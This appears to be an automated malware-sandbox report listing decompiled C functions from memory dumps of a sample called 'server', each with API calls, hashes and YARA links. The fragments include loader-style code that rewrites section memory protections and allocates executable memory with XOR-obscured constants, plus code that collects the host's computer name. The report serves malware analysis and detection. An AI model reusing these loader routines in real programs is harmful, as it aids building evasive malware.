Instruction Fuzzy Hash: 7701BC36200209BBDB215FA5AC44FEA7BB9EF84754F404469FA009A160EA72C864CB50

Uniqueness

Uniqueness Score: -1.00%

Function 004014CF Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004014CF(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t42;
				long _t53;
				intOrPtr _t56;
				void* _t57;
				signed int _t59;

				_v12 = _v12 & 0x00000000;
				_t56 =  *0x404180;
				_t57 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t56 - 0x43175abf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t59 = _v12;
					if(_t59 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t59 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t53 = _t56 - 0x43175abf;
							L9:
							_t42 = VirtualProtect( *((intOrPtr*)(_t57 + 0xc)) + _a4,  *(_t57 + 8), _t53,  &_v20); // executed
							if(_t42 == 0) {
								_v12 = GetLastError();
							}
							_t57 = _t57 + (_t56 - 0x3175ac2) * 0x28;
							_v8 = _v8 + 1;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t53 = _t56 - 0x43175ac1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t59 >= 0) {
						_t53 = _t56 - 0x43175aa3;
					} else {
						_t53 = _t56 - 0x43175a83;
					}
					goto L9;
				}
				goto L12;
			}

0x004014d9
0x004014e6
0x004014ec
0x004014f8
0x00401508
0x0040150a
0x00401512
0x004015a6
0x004015ad
0x00000000
0x00000000
0x00000000
0x00401518
0x00401518
0x00401518
0x0040151c
0x00000000
0x00000000
0x00401528
0x0040152c
0x00401550
0x00401554
0x00401568
0x00401568
0x0040156e
0x0040157d
0x00401581
0x00401589
0x00401589
0x00401595
0x00401597
0x004015a0
0x00000000
0x00000000
0x00000000
0x00000000
0x004015a0
0x0040155c
0x00401560
0x00401566
0x00000000
0x00000000
0x00000000
0x00401566
0x00401534
0x00401538
0x00401542
0x0040153a
0x0040153a
0x0040153a
0x00000000
0x00401538
0x00000000

APIs

VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
VirtualProtect.KERNEL32(00000000,?,?,?), ref: 0040157D
GetLastError.KERNEL32 ref: 00401583

Memory Dump Source

Source File: 00000000.00000002.568999225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.568999225.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.568999225.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.568999225.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_server.jbxd

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
Instruction ID: db8870d9979c58085381c8b0541bfb0d1fdb36fbc34c572f0fe0e58abbf4653c
Opcode Fuzzy Hash: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
Instruction Fuzzy Hash: D1212B7280121AEFCB14CF95C9819AAF7B4FF58305F04487AE413AB960E738AA55CF58

Uniqueness

Uniqueness Score: -1.00%

Function 02BD61DA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02BD61DA(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x2bda2d8, 0, _a4); // executed
				return _t2;
			}

0x02bd61e6
0x02bd61ec

APIs

RtlFreeHeap.NTDLL(00000000,00000000,02BD6383,00000000,?,00000000,00000000), ref: 02BD61E6

Strings

Uqt, xrefs: 02BD61E6

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: FreeHeap
String ID: Uqt
API String ID: 3298025750-2320327147
Opcode ID: ba1ce741bea9028a5d7bf5c7ab9544f5fd4e11c4d27862acf4b63f54cd31c887
Instruction ID: cff382a3dabe14ce96ff36e29e1f9945d1f267d2033be7286daa6878d93ce199
Opcode Fuzzy Hash: ba1ce741bea9028a5d7bf5c7ab9544f5fd4e11c4d27862acf4b63f54cd31c887
Instruction Fuzzy Hash: 94B01271981200ABCF114B01EE14F457A21A750740F104810B348D107492320430FB15

Uniqueness

Uniqueness Score: -1.00%

Function 02199F40 Relevance: 3.2, APIs: 2, Instructions: 236memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000040,?), ref: 02199F86
VirtualProtect.KERNEL32(?,?,00000000), ref: 0219A1D0

Memory Dump Source

Source File: 00000000.00000002.569302533.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2190000_server.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 6a4e5aa6d90b8b3ed13825a8e48c3be58f940a9f27a0826dba1cadd81984fabe
Instruction ID: f194941db022107fdb29dd3d95bb131cd2e58fdaafdeff1a356ede1e90fae2fc
Opcode Fuzzy Hash: 6a4e5aa6d90b8b3ed13825a8e48c3be58f940a9f27a0826dba1cadd81984fabe
Instruction Fuzzy Hash: F1B198B5A00209DFCB08CF88C895EAEBBB6BF88314F148159E9099B355D735E985CFD4

Uniqueness

Uniqueness Score: -1.00%

Function 02BD790B Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E02BD790B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E02BD4358(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x2bda348; // 0x9dd5a8
						_t20 = _t68 + 0x2bdb270; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E02BD4984(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x02bd7911
0x02bd7914
0x02bd7924
0x02bd792d
0x02bd7931
0x02bd79ff
0x02bd7a05
0x02bd7a05
0x02bd794b
0x02bd7950
0x02bd7954
0x02bd795a
0x02bd795f
0x02bd7966
0x02bd7975
0x02bd7975
0x02bd7979
0x02bd797b
0x02bd7987
0x02bd7992
0x02bd799d
0x02bd79a1
0x02bd79ab
0x02bd79af
0x02bd79b1
0x02bd79b6
0x02bd79bd
0x02bd79cd
0x02bd79cd
0x02bd79b6
0x02bd79af
0x02bd79cf
0x02bd79d4
0x02bd79d9
0x02bd79d9
0x02bd79dc
0x02bd79e5
0x02bd79ea
0x02bd79ea
0x02bd79ef
0x02bd79f4
0x02bd79f4
0x02bd79ef
0x02bd7979
0x02bd79f6
0x02bd79fc
0x00000000

APIs

Part of subcall function 02BD4358: SysAllocString.OLEAUT32(80000002), ref: 02BD43B5
Part of subcall function 02BD4358: SysFreeString.OLEAUT32(00000000), ref: 02BD441B

SysFreeString.OLEAUT32(?), ref: 02BD79EA
SysFreeString.OLEAUT32(02BD4D42), ref: 02BD79F4

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 039e4950f5904ee94e7b880017c0fc3fa569ce6188e07473e91c68f3656497ea
Instruction ID: b4fe21f3687a858281b348b2ccf1c736fc3893a784e2a6f0da0334ef61d10cb1
Opcode Fuzzy Hash: 039e4950f5904ee94e7b880017c0fc3fa569ce6188e07473e91c68f3656497ea
Instruction Fuzzy Hash: B2316932500148BFCF11DFA8C888CDBBB7AFBC97447144698F9059B214E7369D91DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040139F Relevance: 3.1, APIs: 2, Instructions: 60
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040139F() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				void* _t24;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t35;
				intOrPtr _t38;

				_t15 =  *0x404184;
				if( *0x40416c > 5) {
					_t16 = _t15 + 0x40513c;
				} else {
					_t16 = _t15 + 0x40529c;
				}
				E00401D3C(_t16, _t16);
				_t35 = 6;
				memset( &_v32, 0, _t35 << 2);
				_t24 = E00401882( &_v32,  &_v16,  *0x404180 ^ 0xdd0210cf); // executed
				if(_t24 == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x404178);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E004015B0(_t38, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x404178 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							L00401FE6(_t32 + 4);
						}
					}
					_t25 = E004012FB(_v28); // executed
				}
				ExitThread(_t25);
			}

0x004013a5
0x004013b6
0x004013c0
0x004013b8
0x004013b8
0x004013b8
0x004013c7
0x004013d0
0x004013d5
0x004013ec
0x004013f3
0x00401450
0x004013f5
0x004013fb
0x00401401
0x0040140f
0x00401413
0x0040141a
0x00401422
0x00401426
0x0040142e
0x0040143f
0x00401430
0x00401436
0x00401436
0x0040142e
0x00401447
0x00401447
0x00401452

APIs

lstrlenW.KERNEL32(?,?,?,?), ref: 004013FB
ExitThread.KERNEL32 ref: 00401452

Memory Dump Source

Source File: 00000000.00000002.568999225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.568999225.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.568999225.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.568999225.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_server.jbxd

Similarity

API ID: ExitThreadlstrlen
String ID:
API String ID: 2636182767-0
Opcode ID: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
Instruction ID: 2b8b17c81bcefa181eed95ac27ced154ec6146dfe98fb58ff2424010aaaeeb75
Opcode Fuzzy Hash: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
Instruction Fuzzy Hash: A511E271504205ABE700EB61DD48E5B77ECAF84314F00493BB941F72B1EB38EA448B5A

Uniqueness

Uniqueness Score: -1.00%

Function 02BD3284 Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 02BD32AB

Part of subcall function 02BD790B: SysFreeString.OLEAUT32(?), ref: 02BD79EA

SafeArrayDestroy.OLEAUT32(?), ref: 02BD32FB

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: ArraySafe$CreateDestroyFreeString
String ID:
API String ID: 3098518882-0
Opcode ID: b0e1afe280b7578213556f9bbb3bc05b1e2c1af8226f31b6c41ae0c9f4f28401
Instruction ID: e6c51f089565e67eb9433e5d4cb8f857fe94f993f18b8f5e877e15a357e18842
Opcode Fuzzy Hash: b0e1afe280b7578213556f9bbb3bc05b1e2c1af8226f31b6c41ae0c9f4f28401
Instruction Fuzzy Hash: AC117C3290010ABFDB019FA8CC04AEEBBB9EF08750F018065EA04E7160F7719A259FA1

Uniqueness

Uniqueness Score: -1.00%

Function 02199A20 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 02199AA4

Strings

VirtualAlloc, xrefs: 02199A89, 02199A8C

Memory Dump Source

Source File: 00000000.00000002.569302533.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2190000_server.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction ID: 0b2d6d64375ce67704a1a65b14e17fc5eb3fa96028d9bc7ec314ff1e7746c143
Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction Fuzzy Hash: 16113DB0D08289EEEF01DBE88409BEEBFB55B11705F044098D5446A282D7BA5758CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 02BD33F1 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02BD33F1(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E02BD58BD(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x2bda2d8, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E02BD2839(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}

0x02bd33f1
0x02bd33f9
0x02bd3410
0x02bd342b
0x02bd342f
0x02bd3434
0x02bd3436
0x02bd3448
0x02bd3454
0x02bd3438
0x02bd3438
0x02bd343d
0x02bd3442
0x02bd3442
0x02bd3436
0x02bd345a
0x02bd345e
0x02bd345e
0x02bd3405
0x02bd340a
0x02bd340e
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 02BD2839: SysFreeString.OLEAUT32(00000000), ref: 02BD289C

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,7476F710,?,00000000,?,00000000,?,02BD528E,?,004F0053,035B9218,00000000,?), ref: 02BD3454

Strings

Uqt, xrefs: 02BD3454

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: Free$HeapString
String ID: Uqt
API String ID: 3806048269-2320327147
Opcode ID: b891fe00d4993aea896d056f7548f2b095a799524e89b2606355a5fbd1c5e2a7
Instruction ID: b4f19556ad4cce7a2276902b59b1fc20c0f06be3dd9038addc246ddd3a71e1e4
Opcode Fuzzy Hash: b891fe00d4993aea896d056f7548f2b095a799524e89b2606355a5fbd1c5e2a7
Instruction Fuzzy Hash: 4A014B32901619BBCB239F54CC01FEA3FA5EF04790F4884A4FE099A161E731E960DF91

Uniqueness

Uniqueness Score: -1.00%

Function 02BD472F Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E02BD472F(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E02BD33DC(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E02BD61DA(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x02bd4734
0x02bd473f
0x02bd4741
0x02bd4747
0x02bd4749
0x02bd474e
0x02bd4757
0x02bd475b
0x02bd4764
0x02bd4768
0x02bd4777
0x02bd476a
0x02bd476b
0x02bd4770
0x02bd4770
0x02bd4768
0x02bd475b
0x02bd4780

APIs

GetComputerNameExA.KERNEL32(00000003,00000000,02BD3DCD,00000000,00000000,?,775EC740,02BD3DCD), ref: 02BD4747

Part of subcall function 02BD33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BD62F6), ref: 02BD33E8

GetComputerNameExA.KERNEL32(00000003,00000000,02BD3DCD,02BD3DCE,?,775EC740,02BD3DCD), ref: 02BD4764

Part of subcall function 02BD61DA: RtlFreeHeap.NTDLL(00000000,00000000,02BD6383,00000000,?,00000000,00000000), ref: 02BD61E6

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: ea80e3b5a68ff7918e29b1bfa002b975b9010f3fa55efa759b125b283a2ae5b1
Instruction ID: c93cabf1bcd5a1c28f5344c9354820ebafb5c0a8e2a37d936086ed025b247517
Opcode Fuzzy Hash: ea80e3b5a68ff7918e29b1bfa002b975b9010f3fa55efa759b125b283a2ae5b1
Instruction Fuzzy Hash: F9F05E36A0011AFBEB11D6AA9D40EEF77FDDBC6658F5100A9A904D3140FF70DE028A70

Uniqueness

Uniqueness Score: -1.00%

Function 02BD5006 Relevance: 3.0, APIs: 2, Instructions: 26
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02BD5006(signed int __edx, intOrPtr _a4) {
				void* _t3;
				void* _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				signed int _t10;

				_t10 = __edx;
				_t3 = HeapCreate(0, 0x400000, 0); // executed
				 *0x2bda2d8 = _t3;
				if(_t3 == 0) {
					_t8 = 8;
					return _t8;
				}
				 *0x2bda1c8 = GetTickCount();
				_t5 = E02BD54D8(_a4);
				if(_t5 == 0) {
					_t5 = E02BD213E(_t9, _a4); // executed
					if(_t5 == 0) {
						if(E02BD6392(_t9) != 0) {
							 *0x2bda300 = 1; // executed
						}
						_t7 = E02BD2523(_t10); // executed
						return _t7;
					}
				}
				return _t5;
			}

0x02bd5006
0x02bd500f
0x02bd5015
0x02bd501c
0x02bd5020
0x00000000
0x02bd5020
0x02bd502d
0x02bd5032
0x02bd5039
0x02bd503f
0x02bd5046
0x02bd504f
0x02bd5051
0x02bd5051
0x02bd505b
0x00000000
0x02bd505b
0x02bd5046
0x02bd5060

APIs

HeapCreate.KERNEL32(00000000,00400000,00000000,02BD107E,?), ref: 02BD500F
GetTickCount.KERNEL32 ref: 02BD5023

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: CountCreateHeapTick
String ID:
API String ID: 2177101570-0
Opcode ID: beeb4259e49a263fc9b639c02cc708880092f9c727da8fd66493987283ab0b60
Instruction ID: 33e3b880d3475da14aa92c3bdda82614f51983a7f7a227ead7dec99e4da25d01
Opcode Fuzzy Hash: beeb4259e49a263fc9b639c02cc708880092f9c727da8fd66493987283ab0b60
Instruction Fuzzy Hash: 75F09230AC0701ABEB722B71AC347D53695EF04785FD4C8A5E905E6081FB71D4609F65

Uniqueness

Uniqueness Score: -1.00%

Function 02BD2839 Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E02BD2839(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x2bda348; // 0x9dd5a8
				_t4 = _t15 + 0x2bdb3e8; // 0x35b8990
				_t20 = _t4;
				_t6 = _t15 + 0x2bdb174; // 0x650047
				_t17 = E02BD790B(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E02BD661C(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x02bd2843
0x02bd284a
0x02bd284b
0x02bd284c
0x02bd284d
0x02bd2853
0x02bd2858
0x02bd2858
0x02bd2862
0x02bd2874
0x02bd287b
0x02bd28a9
0x02bd287d
0x02bd287f
0x02bd2884
0x02bd28a6
0x02bd2886
0x02bd2889
0x02bd2890
0x02bd2895
0x02bd2897
0x02bd2897
0x02bd289c
0x02bd289c
0x02bd2884
0x02bd28b0

APIs

Part of subcall function 02BD790B: SysFreeString.OLEAUT32(?), ref: 02BD79EA

Part of subcall function 02BD661C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,02BD4B72,004F0053,00000000,?), ref: 02BD6625
Part of subcall function 02BD661C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,02BD4B72,004F0053,00000000,?), ref: 02BD664F
Part of subcall function 02BD661C: memset.NTDLL ref: 02BD6663

SysFreeString.OLEAUT32(00000000), ref: 02BD289C

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 04f09a952d33c4aec73cd43d01b5b8a4641cd5720f571a9b89bfabccf7e802dc
Instruction ID: ee14ba5ee09eedb976150e46267c718c367fd5b75798b418ff7dc0b8c88b743d
Opcode Fuzzy Hash: 04f09a952d33c4aec73cd43d01b5b8a4641cd5720f571a9b89bfabccf7e802dc
Instruction Fuzzy Hash: CA017C32940119BFEB119FA8DC44AEABBB9FF04754F0146A5EE01E7061F772A961CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00401D3C Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00401D3C(void* __eax, intOrPtr _a4) {

				 *0x404190 =  *0x404190 & 0x00000000;
				_push(0);
				_push(0x40418c);
				_push(1);
				_push(_a4);
				 *0x404188 = 0xc; // executed
				L00401682(); // executed
				return __eax;
			}

0x00401d3c
0x00401d43
0x00401d45
0x00401d4a
0x00401d4c
0x00401d50
0x00401d5a
0x00401d5f

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(004013CC,00000001,0040418C,00000000), ref: 00401D5A

Memory Dump Source

Source File: 00000000.00000002.568999225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.568999225.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.568999225.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.568999225.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_server.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
Instruction ID: 8b1a9882f0f7b6f5a619b3d6300b2bdd32795284b236dc0e31706888a106ff8d
Opcode Fuzzy Hash: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
Instruction Fuzzy Hash: AFC04CF4140300B7E620AB409D5AF057A5577A4715F61062DFB04391E1C3F91094952D

Uniqueness

Uniqueness Score: -1.00%

Function 004012E6 Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004012E6(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x404160, 0, _a4); // executed
				return _t2;
			}

0x004012f2
0x004012f8

APIs

